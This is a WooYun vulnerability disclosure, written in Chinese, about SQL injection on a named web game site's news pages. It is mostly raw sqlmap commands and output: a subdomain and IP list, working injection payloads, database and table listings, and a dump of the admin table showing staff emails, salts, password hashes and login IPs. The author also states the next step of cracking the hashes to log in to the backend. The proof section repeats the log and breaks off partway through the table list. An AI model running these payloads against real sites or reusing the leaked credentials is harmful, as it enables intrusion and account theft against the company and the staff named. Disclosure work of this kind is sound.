当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123305

漏洞标题:四九游网页游戏主站某处伪静态存在SQL注入影响2个数据库100张表(包括管理员帐号密码)送初学者案例

相关厂商:49you.com

漏洞作者: ’‘Nome

提交时间:2015-06-29 08:49

修复时间:2015-08-13 10:26

公开时间:2015-08-13 10:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

目测该公司也就2个数据库 一个存储数据的,一个配置的

详细说明:

用lijiejie的神器先挖二级域名

blog.49you.com                120.31.134.71                                   
www.49you.com 120.26.12.115
cs.49you.com 120.26.12.115
i.49you.com 121.10.246.74
user.49you.com 120.26.12.115
mail.49you.com 112.90.78.157, 112.90.77.178
pay.49you.com 120.26.12.115
bbs.49you.com 122.13.176.71
shop.49you.com 120.26.12.115
h5.49you.com 61.136.166.94, 120.26.12.115
m.49you.com 119.38.128.234
gm.49you.com 119.38.128.227
status.49you.com 112.91.150.231
api.49you.com 119.38.128.229, 119.38.128.228
all.49you.com 183.6.152.58
met.49you.com 222.132.16.231, 222.132.16.232
dj.49you.com 211.147.224.152
adv.49you.com 120.26.3.80
customer.49you.com 121.10.246.67
vpn.49you.com 112.90.180.118
stage.49you.com 120.26.3.80
ml.49you.com 120.26.3.86
m.49you.com 119.38.128.234
count.adv.49you.com 119.38.128.236
24 found | 0 remaining | 34009 scanned in 417.17 secondsro


然后进行挨个网站进入
进入到

http://i.49you.com/news/item/catid/55*/id*/15*.html

的时候进行sql注入测试
root@kali:~# sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150520}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:25:41
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:25:42] [INFO] testing connection to the target URL
[15:25:43] [INFO] testing if the target URL is stable. This can take a couple of seconds
[15:25:44] [INFO] target URL is stable
[15:25:44] [INFO] testing if URI parameter '#1*' is dynamic
[15:25:44] [INFO] confirming that URI parameter '#1*' is dynamic
[15:25:44] [WARNING] URI parameter '#1*' does not appear dynamic
[15:25:44] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[15:25:44] [INFO] testing for SQL injection on URI parameter '#1*'
[15:25:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:46] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:25:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:25:48] [INFO] testing 'MySQL inline queries'
[15:25:48] [INFO] testing 'PostgreSQL inline queries'
[15:25:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:25:48] [INFO] testing 'Oracle inline queries'
[15:25:48] [INFO] testing 'SQLite inline queries'
[15:25:48] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:25:48] [WARNING] time-based comparison requires larger statistical model, please wait....
[15:25:59] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 stacked queries' injectable
[15:25:59] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[15:26:09] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
[15:26:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:26:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:26:10] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[15:26:10] [INFO] target URL appears to have 6 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[15:26:19] [INFO] URI parameter '#1*' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if ann
sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:27:19] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:27:19] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 32 times
[15:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:27:19
有戏。。。。。55存在伪静态注入
开始查询有多少个数据库: sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" --dbs

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:28:57] [INFO] resuming back-end DBMS 'mysql'
[15:28:57] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:28:58] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:28:58] [INFO] fetching database names
[15:28:58] [INFO] the SQL query used returns 2 entries
[15:28:58] [INFO] retrieved: information_schema
[15:28:58] [INFO] retrieved: i_49you
available databases [2]:
[*] i_49you
[*] information_schema
[15:28:59] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[15:28:59] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:28:59


俩个数据库 第一个数据库有管理员的表,第二个也就是配置库了
进下来进入库子 :sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" -D "i_49you" --tables

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:29:31] [INFO] resuming back-end DBMS 'mysql'
[15:29:31] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:29:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:29:32] [INFO] fetching tables for database: 'i_49you'
[15:29:32] [INFO] the SQL query used returns 100 entries
[15:29:32] [INFO] retrieved: admin
[15:29:32] [INFO] retrieved: admin_panel
[15:29:32] [INFO] retrieved: admin_role
[15:29:32] [INFO] retrieved: admin_role_priv
[15:29:33] [INFO] retrieved: announce
[15:29:33] [INFO] retrieved: attachment
[15:29:33] [INFO] retrieved: attachment_index
[15:29:33] [INFO] retrieved: badword
[15:29:33] [INFO] retrieved: block
[15:29:33] [INFO] retrieved: block_history
[15:29:33] [INFO] retrieved: block_priv
[15:29:34] [INFO] retrieved: cache
[15:29:34] [INFO] retrieved: category
[15:29:34] [INFO] retrieved: category_priv
[15:29:34] [INFO] retrieved: collection_content
[15:29:34] [INFO] retrieved: collection_history
[15:29:34] [INFO] retrieved: collection_node
[15:29:35] [INFO] retrieved: collection_program
[15:29:35] [INFO] retrieved: content_check
[15:29:35] [INFO] retrieved: copyfrom
[15:29:35] [INFO] retrieved: datacall
[15:29:35] [INFO] retrieved: dbsource
[15:29:35] [INFO] retrieved: download
[15:29:35] [INFO] retrieved: download_data
[15:29:36] [INFO] retrieved: downservers
[15:29:36] [INFO] retrieved: extend_setting
[15:29:36] [INFO] retrieved: favorite
[15:29:36] [INFO] retrieved: game
[15:29:36] [INFO] retrieved: game_data
[15:29:36] [INFO] retrieved: hits
[15:29:37] [INFO] retrieved: ipbanned
[15:29:37] [INFO] retrieved: keylink
[15:29:37] [INFO] retrieved: keyword
[15:29:37] [INFO] retrieved: keyword_data
[15:29:37] [INFO] retrieved: link
[15:29:37] [INFO] retrieved: linkage
[15:29:37] [INFO] retrieved: log
[15:29:38] [INFO] retrieved: member
[15:29:38] [INFO] retrieved: member_detail
[15:29:38] [INFO] retrieved: member_group
[15:29:38] [INFO] retrieved: member_menu
[15:29:38] [INFO] retrieved: member_verify
[15:29:38] [INFO] retrieved: member_vip
[15:29:39] [INFO] retrieved: menu
[15:29:39] [INFO] retrieved: message
[15:29:39] [INFO] retrieved: message_data
[15:29:39] [INFO] retrieved: message_group
[15:29:39] [INFO] retrieved: model
[15:29:39] [INFO] retrieved: model_field
[15:29:39] [INFO] retrieved: module
[15:29:40] [INFO] retrieved: mood
[15:29:40] [INFO] retrieved: news
[15:29:40] [INFO] retrieved: news_data
[15:29:40] [INFO] retrieved: page
[15:29:40] [INFO] retrieved: pay_account
[15:29:40] [INFO] retrieved: pay_payment
[15:29:41] [INFO] retrieved: pay_spend
[15:29:41] [INFO] retrieved: position
[15:29:41] [INFO] retrieved: position_data
[15:29:41] [INFO] retrieved: poster
[15:29:41] [INFO] retrieved: poster_201409
[15:29:41] [INFO] retrieved: poster_201506
[15:29:42] [INFO] retrieved: poster_space
[15:29:42] [INFO] retrieved: queue
[15:29:42] [INFO] retrieved: release_point
[15:29:42] [INFO] retrieved: search
[15:29:42] [INFO] retrieved: search_keyword
[15:29:42] [INFO] retrieved: session
[15:29:43] [INFO] retrieved: site
[15:29:43] [INFO] retrieved: sms_report
[15:29:43] [INFO] retrieved: special
[15:29:43] [INFO] retrieved: special_c_data
[15:29:43] [INFO] retrieved: special_content
[15:29:43] [INFO] retrieved: sphinx_counter
[15:29:43] [INFO] retrieved: sqlmapoutput
[15:29:44] [INFO] retrieved: sso_admin
[15:29:44] [INFO] retrieved: sso_applications
[15:29:44] [INFO] retrieved: sso_members
[15:29:44] [INFO] retrieved: sso_messagequeue
[15:29:44] [INFO] retrieved: sso_session
[15:29:44] [INFO] retrieved: sso_settings
[15:29:45] [INFO] retrieved: tag
[15:29:45] [INFO] retrieved: template_bak
[15:29:45] [INFO] retrieved: test_artice
[15:29:45] [INFO] retrieved: test_artice_data
[15:29:45] [INFO] retrieved: test_picture
[15:29:45] [INFO] retrieved: test_picture_data
[15:29:45] [INFO] retrieved: times
[15:29:46] [INFO] retrieved: type
[15:29:46] [INFO] retrieved: urlrule
[15:29:46] [INFO] retrieved: video
[15:29:46] [INFO] retrieved: video_content
[15:29:46] [INFO] retrieved: video_data
[15:29:46] [INFO] retrieved: video_store
[15:29:47] [INFO] retrieved: vote_data
[15:29:47] [INFO] retrieved: vote_option
[15:29:47] [INFO] retrieved: vote_subject
[15:29:47] [INFO] retrieved: wap
[15:29:47] [INFO] retrieved: wap_type
[15:29:47] [INFO] retrieved: workflow
Database: i_49you
[100 tables]
+--------------------+
| module |
| position |
| session |
| admin |
| admin_panel |
| admin_role |
| admin_role_priv |
| announce |
| attachment |
| attachment_index |
| badword |
| block |
| block_history |
| block_priv |
| cache |
| category |
| category_priv |
| collection_content |
| collection_history |
| collection_node |
| collection_program |
| content_check |
| copyfrom |
| datacall |
| dbsource |
| download |
| download_data |
| downservers |
| extend_setting |
| favorite |
| game |
| game_data |
| hits |
| ipbanned |
| keylink |
| keyword |
| keyword_data |
| link |
| linkage |
| log |
| member |
| member_detail |
| member_group |
| member_menu |
| member_verify |
| member_vip |
| menu |
| message |
| message_data |
| message_group |
| model |
| model_field |
| mood |
| news |
| news_data |
| page |
| pay_account |
| pay_payment |
| pay_spend |
| position_data |
| poster |
| poster_201409 |
| poster_201506 |
| poster_space |
| queue |
| release_point |
| search |
| search_keyword |
| site |
| sms_report |
| special |
| special_c_data |
| special_content |
| sphinx_counter |
| sqlmapoutput |
| sso_admin |
| sso_applications |
| sso_members |
| sso_messagequeue |
| sso_session |
| sso_settings |
| tag |
| template_bak |
| test_artice |
| test_artice_data |
| test_picture |
| test_picture_data |
| times |
| type |
| urlrule |
| video |
| video_content |
| video_data |
| video_store |
| vote_data |
| vote_option |
| vote_subject |
| wap |
| wap_type |
| workflow |
+--------------------+
[15:29:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 101 times
[15:29:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:29:48


100张表
下一步:
sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" -D "i_49you" -T "admin"--dump
进管理员表:
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+---------------+
| roleid | userid | lang | card | email | encrypt | username | realname | password | lastloginip | lastlogintime |
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+---------------+
| 1 | 1 | <blank> | <blank> | tanxz@49app.com | s6SCI6 | admin | <blank> | 6074e9112bb7fe18a8aadb8495f73df7 | 113.99.0.43 | 1431054485 |
| 2 | 2 | <blank> | <blank> | fdsafds@qq.com | v9XvY2 | livebasic | test | 27357894d16487c7bb2e196a4d0f77e8 | 183.131.11.101 | 1411466593 |
| 2 | 3 | <blank> | <blank> | qianhm@49app.com | HSCAPv | meimei | 每每 | f1e0824af35f2380c22b730bfdf36e4c | 183.6.152.58 | 1417662909 |
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+-------

2015-06-28 16:23:02的屏幕截图.png


2015-06-28 16:24:12的屏幕截图.png

最后一步,解密进后台
完工~~~~撤。。。
接下来

漏洞证明:

用lijiejie的神器先挖二级域名

blog.49you.com                120.31.134.71                                   
www.49you.com 120.26.12.115
cs.49you.com 120.26.12.115
i.49you.com 121.10.246.74
user.49you.com 120.26.12.115
mail.49you.com 112.90.78.157, 112.90.77.178
pay.49you.com 120.26.12.115
bbs.49you.com 122.13.176.71
shop.49you.com 120.26.12.115
h5.49you.com 61.136.166.94, 120.26.12.115
m.49you.com 119.38.128.234
gm.49you.com 119.38.128.227
status.49you.com 112.91.150.231
api.49you.com 119.38.128.229, 119.38.128.228
all.49you.com 183.6.152.58
met.49you.com 222.132.16.231, 222.132.16.232
dj.49you.com 211.147.224.152
adv.49you.com 120.26.3.80
customer.49you.com 121.10.246.67
vpn.49you.com 112.90.180.118
stage.49you.com 120.26.3.80
ml.49you.com 120.26.3.86
m.49you.com 119.38.128.234
count.adv.49you.com 119.38.128.236
24 found | 0 remaining | 34009 scanned in 417.17 secondsro


然后进行挨个网站进入
进入到

http://i.49you.com/news/item/catid/55*/id*/15*.html

的时候进行sql注入测试
root@kali:~# sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150520}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:25:41
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:25:42] [INFO] testing connection to the target URL
[15:25:43] [INFO] testing if the target URL is stable. This can take a couple of seconds
[15:25:44] [INFO] target URL is stable
[15:25:44] [INFO] testing if URI parameter '#1*' is dynamic
[15:25:44] [INFO] confirming that URI parameter '#1*' is dynamic
[15:25:44] [WARNING] URI parameter '#1*' does not appear dynamic
[15:25:44] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[15:25:44] [INFO] testing for SQL injection on URI parameter '#1*'
[15:25:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:46] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:25:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:25:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:25:48] [INFO] testing 'MySQL inline queries'
[15:25:48] [INFO] testing 'PostgreSQL inline queries'
[15:25:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:25:48] [INFO] testing 'Oracle inline queries'
[15:25:48] [INFO] testing 'SQLite inline queries'
[15:25:48] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:25:48] [WARNING] time-based comparison requires larger statistical model, please wait....
[15:25:59] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 stacked queries' injectable
[15:25:59] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[15:26:09] [INFO] URI parameter '#1*' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
[15:26:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:26:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:26:10] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[15:26:10] [INFO] target URL appears to have 6 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[15:26:19] [INFO] URI parameter '#1*' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if ann
sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:27:19] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:27:19] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 32 times
[15:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:27:19
有戏。。。。。55存在伪静态注入
开始查询有多少个数据库: sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" --dbs

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:28:57] [INFO] resuming back-end DBMS 'mysql'
[15:28:57] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:28:58] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:28:58] [INFO] fetching database names
[15:28:58] [INFO] the SQL query used returns 2 entries
[15:28:58] [INFO] retrieved: information_schema
[15:28:58] [INFO] retrieved: i_49you
available databases [2]:
[*] i_49you
[*] information_schema
[15:28:59] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[15:28:59] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:28:59


俩个数据库 第一个数据库有管理员的表,第二个也就是配置库了
进下来进入库子 :sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" -D "i_49you" --tables

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[15:29:31] [INFO] resuming back-end DBMS 'mysql'
[15:29:31] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55') AND 5748=5748 AND ('PVTP'='PVTP/id/15.html
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: http://i.49you.com:80/news/item/catid/-3532') UNION ALL SELECT 27,27,27,27,CONCAT(0x717a766a71,0x61444764746356687863,0x7178717071),27#/id/15.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://i.49you.com:80/news/item/catid/55'); SELECT SLEEP(5)-- /id/15.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: http://i.49you.com:80/news/item/catid/55') AND (SELECT * FROM (SELECT(SLEEP(5)))UocR) AND ('QaNG'='QaNG/id/15.html
---
[15:29:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[15:29:32] [INFO] fetching tables for database: 'i_49you'
[15:29:32] [INFO] the SQL query used returns 100 entries
[15:29:32] [INFO] retrieved: admin
[15:29:32] [INFO] retrieved: admin_panel
[15:29:32] [INFO] retrieved: admin_role
[15:29:32] [INFO] retrieved: admin_role_priv
[15:29:33] [INFO] retrieved: announce
[15:29:33] [INFO] retrieved: attachment
[15:29:33] [INFO] retrieved: attachment_index
[15:29:33] [INFO] retrieved: badword
[15:29:33] [INFO] retrieved: block
[15:29:33] [INFO] retrieved: block_history
[15:29:33] [INFO] retrieved: block_priv
[15:29:34] [INFO] retrieved: cache
[15:29:34] [INFO] retrieved: category
[15:29:34] [INFO] retrieved: category_priv
[15:29:34] [INFO] retrieved: collection_content
[15:29:34] [INFO] retrieved: collection_history
[15:29:34] [INFO] retrieved: collection_node
[15:29:35] [INFO] retrieved: collection_program
[15:29:35] [INFO] retrieved: content_check
[15:29:35] [INFO] retrieved: copyfrom
[15:29:35] [INFO] retrieved: datacall
[15:29:35] [INFO] retrieved: dbsource
[15:29:35] [INFO] retrieved: download
[15:29:35] [INFO] retrieved: download_data
[15:29:36] [INFO] retrieved: downservers
[15:29:36] [INFO] retrieved: extend_setting
[15:29:36] [INFO] retrieved: favorite
[15:29:36] [INFO] retrieved: game
[15:29:36] [INFO] retrieved: game_data
[15:29:36] [INFO] retrieved: hits
[15:29:37] [INFO] retrieved: ipbanned
[15:29:37] [INFO] retrieved: keylink
[15:29:37] [INFO] retrieved: keyword
[15:29:37] [INFO] retrieved: keyword_data
[15:29:37] [INFO] retrieved: link
[15:29:37] [INFO] retrieved: linkage
[15:29:37] [INFO] retrieved: log
[15:29:38] [INFO] retrieved: member
[15:29:38] [INFO] retrieved: member_detail
[15:29:38] [INFO] retrieved: member_group
[15:29:38] [INFO] retrieved: member_menu
[15:29:38] [INFO] retrieved: member_verify
[15:29:38] [INFO] retrieved: member_vip
[15:29:39] [INFO] retrieved: menu
[15:29:39] [INFO] retrieved: message
[15:29:39] [INFO] retrieved: message_data
[15:29:39] [INFO] retrieved: message_group
[15:29:39] [INFO] retrieved: model
[15:29:39] [INFO] retrieved: model_field
[15:29:39] [INFO] retrieved: module
[15:29:40] [INFO] retrieved: mood
[15:29:40] [INFO] retrieved: news
[15:29:40] [INFO] retrieved: news_data
[15:29:40] [INFO] retrieved: page
[15:29:40] [INFO] retrieved: pay_account
[15:29:40] [INFO] retrieved: pay_payment
[15:29:41] [INFO] retrieved: pay_spend
[15:29:41] [INFO] retrieved: position
[15:29:41] [INFO] retrieved: position_data
[15:29:41] [INFO] retrieved: poster
[15:29:41] [INFO] retrieved: poster_201409
[15:29:41] [INFO] retrieved: poster_201506
[15:29:42] [INFO] retrieved: poster_space
[15:29:42] [INFO] retrieved: queue
[15:29:42] [INFO] retrieved: release_point
[15:29:42] [INFO] retrieved: search
[15:29:42] [INFO] retrieved: search_keyword
[15:29:42] [INFO] retrieved: session
[15:29:43] [INFO] retrieved: site
[15:29:43] [INFO] retrieved: sms_report
[15:29:43] [INFO] retrieved: special
[15:29:43] [INFO] retrieved: special_c_data
[15:29:43] [INFO] retrieved: special_content
[15:29:43] [INFO] retrieved: sphinx_counter
[15:29:43] [INFO] retrieved: sqlmapoutput
[15:29:44] [INFO] retrieved: sso_admin
[15:29:44] [INFO] retrieved: sso_applications
[15:29:44] [INFO] retrieved: sso_members
[15:29:44] [INFO] retrieved: sso_messagequeue
[15:29:44] [INFO] retrieved: sso_session
[15:29:44] [INFO] retrieved: sso_settings
[15:29:45] [INFO] retrieved: tag
[15:29:45] [INFO] retrieved: template_bak
[15:29:45] [INFO] retrieved: test_artice
[15:29:45] [INFO] retrieved: test_artice_data
[15:29:45] [INFO] retrieved: test_picture
[15:29:45] [INFO] retrieved: test_picture_data
[15:29:45] [INFO] retrieved: times
[15:29:46] [INFO] retrieved: type
[15:29:46] [INFO] retrieved: urlrule
[15:29:46] [INFO] retrieved: video
[15:29:46] [INFO] retrieved: video_content
[15:29:46] [INFO] retrieved: video_data
[15:29:46] [INFO] retrieved: video_store
[15:29:47] [INFO] retrieved: vote_data
[15:29:47] [INFO] retrieved: vote_option
[15:29:47] [INFO] retrieved: vote_subject
[15:29:47] [INFO] retrieved: wap
[15:29:47] [INFO] retrieved: wap_type
[15:29:47] [INFO] retrieved: workflow
Database: i_49you
[100 tables]
+--------------------+
| module |
| position |
| session |
| admin |
| admin_panel |
| admin_role |
| admin_role_priv |
| announce |
| attachment |
| attachment_index |
| badword |
| block |
| block_history |
| block_priv |
| cache |
| category |
| category_priv |
| collection_content |
| collection_history |
| collection_node |
| collection_program |
| content_check |
| copyfrom |
| datacall |
| dbsource |
| download |
| download_data |
| downservers |
| extend_setting |
| favorite |
| game |
| game_data |
| hits |
| ipbanned |
| keylink |
| keyword |
| keyword_data |
| link |
| linkage |
| log |
| member |
| member_detail |
| member_group |
| member_menu |
| member_verify |
| member_vip |
| menu |
| message |
| message_data |
| message_group |
| model |
| model_field |
| mood |
| news |
| news_data |
| page |
| pay_account |
| pay_payment |
| pay_spend |
| position_data |
| poster |
| poster_201409 |
| poster_201506 |
| poster_space |
| queue |
| release_point |
| search |
| search_keyword |
| site |
| sms_report |
| special |
| special_c_data |
| special_content |
| sphinx_counter |
